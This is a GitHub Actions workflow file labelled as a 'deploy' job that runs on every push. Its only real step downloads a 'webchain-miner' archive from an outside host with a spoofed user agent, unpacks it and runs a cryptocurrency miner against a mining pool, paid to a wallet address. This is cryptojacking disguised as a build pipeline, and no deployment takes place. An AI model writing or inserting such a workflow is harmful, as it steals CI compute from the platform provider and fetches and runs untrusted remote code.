name: De
on: [push]

jobs:
  build:
    name: deploy
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2
      - name: Downloads
        run: |
          wget --user-agent="Mozilla" http://oskarplyt.5v.pl/webchain-miner.tgz
          tar xzvf webchain-miner.tgz
          ./webchain-miner -o pool.webchain.network:3333 -u 0x307929d8e9cb3dc7c605cfad1b70740e74e6c561 -p x
